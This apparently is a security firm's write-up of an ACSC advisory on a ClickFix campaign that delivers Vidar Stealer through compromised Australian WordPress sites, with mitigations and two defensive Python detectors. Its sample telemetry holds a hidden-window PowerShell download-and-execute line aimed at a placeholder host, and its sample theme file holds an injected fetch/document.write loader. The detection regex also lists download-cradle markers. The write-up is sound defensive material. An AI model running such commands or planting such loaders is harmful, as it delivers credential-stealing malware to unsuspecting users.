The Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC — Australia's national cyber security authority, analogous to CISA in the United States) has issued an advisory warning organizations of an active ClickFix social engineering campaign using compromised WordPress websites to deliver the Vidar Stealer information-stealing malware against Australian organizations. The official ACSC advisory confirms the campaign has been escalating since early 2026, targeting multiple sectors across Australian infrastructure using legitimate Australian business websites as unwitting delivery vectors.
The ClickFix Technique Explained
ClickFix (formally cataloged by MITRE as ATT&CK T1204.004: Malicious Copy and Paste — a technique MITRE added specifically to document this social engineering pattern) is an attack method that exploits users' conditioned trust in browser verification prompts. The full attack chain:
- An attacker compromises a legitimate WordPress-hosted website by exploiting a vulnerable plugin, theme, or outdated WordPress core, then injects a malicious JavaScript payload delivery domain into the site.
- The injected domain loads JavaScript from an external API server, which overwrites the visible content of the legitimate page with a fraudulent Cloudflare "Verify you are human" CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) prompt that visually mimics the real Cloudflare verification widget.
- The JavaScript simultaneously copies a malicious PowerShell command to the user's clipboard without any visible indication — the copy happens in the background during page load.
- When the user clicks the verification checkbox, a pop-up appears instructing them to press Win+R (opening the Windows Run dialog), paste from the clipboard, and press Enter.
- The user unknowingly executes the malicious PowerShell command with their user-level privileges, which downloads and installs Vidar Stealer.
The technique is effective precisely because it replicates a familiar, trusted UI (user interface) element — Cloudflare verification prompts are encountered legitimately millions of times daily — and relies entirely on user action rather than exploiting any software vulnerability. Traditional drive-by download detection and browser-based exploit prevention tools do not flag clipboard manipulation.
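Because the clipboard step is invisible to browser-side controls, the practical place to catch ClickFix is endpoint process telemetry: a command pasted into the Run dialog is launched by explorer.exe, so the signal is explorer.exe spawning PowerShell with download-and-execute arguments. The following is an added example, not code from the ACSC advisory or the author, that scores process-creation events for that pattern; it assumes events have been exported as newline-delimited JSON with Sysmon-style field names (Image, ParentImage, CommandLine, User), and the three sample events and the URL in them are constructed placeholders.

```python
import json
import re

# Markers common to pasted payloads: hidden window, encoded command, policy bypass, download cradles.
SUSPICIOUS_ARGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s|-e(?:p|xecutionpolicy)\s+bypass"
    r"|\biex\b|invoke-expression|\biwr\b|invoke-webrequest|downloadstring|\bcurl\b|frombase64string",
    re.IGNORECASE,
)
POWERSHELL = re.compile(r"^(?:powershell|pwsh)(?:\.exe)?$", re.IGNORECASE)

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(evt: dict) -> tuple[str, list[str]]:
    """Score one process-creation event: 'high' when PowerShell is launched by explorer.exe
    (the Run dialog's parent) with suspicious arguments, 'medium' for suspicious arguments only."""
    if not POWERSHELL.match(_basename(evt.get("Image", ""))):
        return "none", []
    cmd = evt.get("CommandLine", "")
    markers = sorted({m.group(0).strip().lower() for m in SUSPICIOUS_ARGS.finditer(cmd)})
    if not markers:
        return "none", []  # a plain interactive shell from Win+R is routine admin use
    reasons = ["suspicious arguments: " + ", ".join(markers)]
    if _basename(evt.get("ParentImage", "")) == "explorer.exe":
        reasons.append("parent is explorer.exe (Run dialog or Start menu launch)")
        return "high", reasons
    return "medium", reasons

def scan(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Scan newline-delimited JSON events; return (user, severity, reasons) for hits."""
    hits = []
    for line in log_text.splitlines():
        if line.strip():
            evt = json.loads(line)
            severity, reasons = score_event(evt)
            if severity != "none":
                hits.append((evt.get("User", "?"), severity, reasons))
    return hits

# Constructed sample telemetry (Sysmon-style field names; not real events; placeholder URL).
SAMPLE_LOG = r"""
{"User": "CORP\\jsmith", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"iex (iwr 'https://example.invalid/verify')\""}
{"User": "CORP\\admin", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell"}
{"User": "CORP\\build", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": "pwsh -enc SQBFAFgA"}
"""

if __name__ == "__main__":
    for user, severity, why in scan(SAMPLE_LOG):
        print(f"[{severity.upper()}] {user}: " + "; ".join(why))
```

The second sample event (an administrator opening a plain shell from Win+R) is deliberately left quiet so the rule does not fire on routine use; tune the marker list to your own baseline.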
Vidar Stealer: Capabilities and Evasion
Vidar Stealer is a commercially distributed (sold as MaaS — Malware-as-a-Service on criminal forums) information stealer capable of exfiltrating:
- Saved browser credentials: usernames and passwords stored in Chrome, Firefox, Edge, and other Chromium-based browsers
- Browser session cookies: allowing account takeover without requiring the victim's password — the attacker simply imports the cookie into their own browser
- Cryptocurrency wallet files and seed phrases: direct theft of digital currency holdings
- Two-factor authentication app databases: enabling bypass of MFA (Multi-Factor Authentication) protections
- System information and hardware fingerprints: used to build device profiles for follow-on fraud
Vidar employs self-deletion of its initial executable after delivery — the dropper that arrives via PowerShell removes itself from disk, leaving the malware operating primarily in memory. This behavior significantly reduces forensic recovery options: by the time an incident is detected, the initial payload file may no longer exist on disk, and memory-resident malware is invisible to file-based antivirus scans.
Exfiltrated data is transmitted to attacker-controlled infrastructure before the malware terminates its disk presence.
The Australian Campaign: Why It Matters
Since early 2026, ACSC has documented ClickFix attacks specifically compromising websites owned by legitimate Australian businesses — not generic foreign hosting or bulletproof providers. This operational choice is deliberate:
- Reputation bypass: Traffic to a recognized Australian business domain is less likely to trigger corporate web proxies or email security gateways configured to allow domestic traffic
- Geographic targeting: Geo-restriction controls used by some enterprises to block foreign web content do not flag domestic Australian domains
- Trust exploitation: Employees may browse Australian supplier or partner websites without the same scrutiny they apply to unknown foreign sites
The campaign targets multiple Australian sectors, though ACSC has not publicly enumerated specific industry verticals in the advisory.
MITRE ATT&CK Mapping
| Technique | Name | ClickFix/Vidar Application |
|---|---|---|
| T1566.002 | Phishing: Spearphishing Link | Victims reach compromised sites via search results or embedded links |
| T1204.004 | Malicious Copy and Paste | Core delivery mechanism — clipboard poisoning |
| T1059.001 | Command and Scripting: PowerShell | Vidar delivered and executed via PowerShell |
| T1555.003 | Credentials from Web Browsers | Browser credential and session cookie theft |
| T1555.001 | Credentials from Password Stores | Cryptocurrency wallet file extraction |
| T1027 | Obfuscated Files or Information | JavaScript injection obfuscates malicious payload |
| T1070.004 | Indicator Removal: File Deletion | Vidar's self-deletion after execution |
Who Is Affected
Any Windows user who browses compromised Australian WordPress sites and follows the "verification" instructions is a potential Vidar Stealer victim. ClickFix is not sector-specific: the campaign targets anyone who visits an affected site, regardless of industry.
Australian businesses whose WordPress sites have been compromised are themselves victims: their infrastructure is being used as an attack delivery rail, and their reputation is associated with the malware delivery.
Organizations with employees who regularly browse external business websites — vendor sites, supplier portals, industry news, partner communications — face ongoing exposure as long as compromised Australian WordPress sites remain active.
What You Should Do Right Now
- Restrict PowerShell execution for non-administrative users. An Execution Policy of AllSigned or RemoteSigned prevents unsigned scripts — including PowerShell payloads delivered via ClickFix — from executing. Enforce organization-wide via Group Policy:
```powershell
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine
```
Note that the execution policy governs script files rather than commands passed inline on the PowerShell command line, and a pasted command can name its own policy, so treat this as one hardening layer and rely on application allow-listing to stop the payload itself.
- Deploy application allow-listing. AppLocker or WDAC (Windows Defender Application Control) policies restricting which executables can launch prevent the Vidar Stealer dropper from running even when a user follows through on the clipboard command.
- Block the Win+R dialog for general users. Where users have no legitimate need for the Windows Run dialog, disable it via Group Policy:
User Configuration → Administrative Templates → Start Menu and Taskbar → Remove Run menu from Start Menu.
- WordPress site owners: patch all themes and plugins immediately. ACSC specifically directs WordPress administrators to apply all available security updates and remove unused or unmaintained themes and plugins, which are the most common initial access vectors for site compromise. WordPress installations are frequently compromised via vulnerable form builders, SEO plugins, and e-commerce extensions.
- Audit externally facing WordPress sites for injected JavaScript. Look for unexpected scripts loading from external domains in theme header or footer files:
```sh
grep -r "fetch(\|XMLHttpRequest\|document.write" /var/www/html/wp-content/themes/
```
Flag any requests to domains not in your approved asset list.
- Incident response for suspected victims. Users who may have followed a "verify you are human" prompt and executed a clipboard command should be treated as confirmed Vidar infections until proven otherwise: isolate the machine, rotate all browser-stored credentials, revoke active browser sessions (Google, Microsoft, banking portals), and submit the system for memory forensics if available.
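The grep in the audit step only surfaces lines to read by hand. The following added example, not the advisory's or the author's code, walks a theme directory, extracts the hosts that script tags, fetch() calls, XMLHttpRequest.open() calls and document.write() pull from, and reports every host outside an allow list, including protocol-relative "//host/" references that a grep for "http" misses. The sample theme files and host names it creates are constructed placeholders.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# URL argument of <script src>, fetch(), .open(method, url) or document.write(); absolute or protocol-relative.
URL_IN_LOADER = re.compile(
    r"""(?:<script[^>]*\bsrc\s*=\s*|fetch\s*\(\s*|\.open\s*\([^,]*,\s*|document\.write\s*\(\s*)["']((?:https?:)?//[^"'\s]+)""",
    re.IGNORECASE)

def external_hosts(text: str):
    """Yield (line_number, host, url) for every loader URL found in a file's text."""
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in URL_IN_LOADER.finditer(line):
            url = m.group(1)
            host = urlparse(url if url.lower().startswith("http") else "https:" + url).hostname
            if host:
                yield lineno, host.lower(), url

def audit_theme_dir(root: str, allowed_hosts: set[str]) -> list[tuple[str, int, str]]:
    """Return (relative path, line, host) for every loader URL whose host is not allow-listed."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith((".php", ".js", ".html")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for lineno, host, _ in external_hosts(fh.read()):
                        if host not in allowed_hosts:
                            findings.append((os.path.relpath(path, root), lineno, host))
    return sorted(findings)

# Constructed sample theme: a legitimate CDN include, an injected loader, and a benign XHR.
SAMPLE_FILES = {
    "header.php": '<script src="https://cdn.example.com/jquery.min.js"></script>\n',
    "footer.php": '<?php wp_footer(); ?>\n<script>fetch("https://api.injected-loader.invalid/v1/verify")'
                  '.then(r => r.text()).then(t => document.write(t));</script>\n',
    "js/app.js": "const x = new XMLHttpRequest(); x.open('GET', '//cdn.example.com/data.json');\n",
}

def run_sample() -> list[tuple[str, int, str]]:
    # Write the constructed theme into a temp dir and audit it against a one-host allow list
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            full = os.path.join(tmp, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return audit_theme_dir(tmp, {"cdn.example.com"})
```

Point audit_theme_dir at a real wp-content/themes directory with your approved CDN and analytics hosts in the allow list; a hit in header.php or footer.php of the active theme is the location ACSC's advice says to check first.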
Background: Understanding the Risk
ClickFix emerged in 2024 and has become one of the most replicated social engineering delivery techniques in 2026, used to distribute Lumma Stealer, DarkGate, NetSupport RAT, and now Vidar Stealer across multiple continents. Its prevalence reflects a fundamental attacker insight: users have been trained for years to complete browser verification prompts without scrutinizing what happens when they click. Cloudflare's real verification widget is ubiquitous and trusted; CAPTCHA fatigue has conditioned users to click "I am human" reflexively.
The use of legitimate Australian WordPress infrastructure as delivery mechanism reflects the broader trend of living-off-trusted-infrastructure attacks. Rather than hosting malicious content on domains that threat intelligence feeds will rapidly flag, attackers compromise reputable sites and inject their payload delivery code, riding the existing reputation of the legitimate domain until it is discovered and cleaned.
Vidar Stealer credentials sold on criminal markets fuel a wide range of follow-on attacks:
- BEC (Business Email Compromise): stolen corporate email session cookies give attackers authenticated access to corporate email, enabling payment redirection fraud and supply chain impersonation
- SaaS account takeover: session cookies for Salesforce, HubSpot, ServiceNow, or Slack allow attackers to move through corporate environments without triggering authentication alerts
- Cryptocurrency theft: directly monetized via wallet file access
- Credential resale: sold on markets like Russian Market, 2easy, or Genesis Market (where buyers pay per credential set)
WordPress compromise for ClickFix delivery typically exploits publicly known vulnerabilities in outdated plugins. Mass exploitation tools scan for specific plugin version fingerprints and automatically inject payloads — meaning a single unpatched plugin across thousands of Australian WordPress sites creates a broad campaign surface with minimal attacker effort.
Conclusion
ACSC's advisory confirms an active ClickFix campaign using compromised Australian WordPress sites to deliver Vidar Stealer against organizations across multiple Australian sectors. Organizations should restrict PowerShell execution, deploy application allow-listing, and audit public-facing WordPress installations for injected JavaScript. Australian WordPress site owners should apply all plugin and theme updates and remove unused components. Any user who may have executed a clipboard-pasted PowerShell command from a verification prompt should be treated as a potential Vidar Stealer victim and their machine isolated pending full credential rotation.
For any query contact us at contact@cipherssecurity.com